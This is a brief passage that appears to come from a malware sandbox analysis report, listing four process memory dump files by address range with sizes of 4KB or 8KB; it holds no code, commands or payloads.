                                            • memory/3832-756-0x0000000004E10000-0x0000000004E11000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3832-757-0x0000000004E12000-0x0000000004E13000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3832-782-0x0000000004E13000-0x0000000004E14000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3896-1085-0x000000001BD60000-0x000000001BD62000-memory.dmp

                                              Filesize

                                              8KB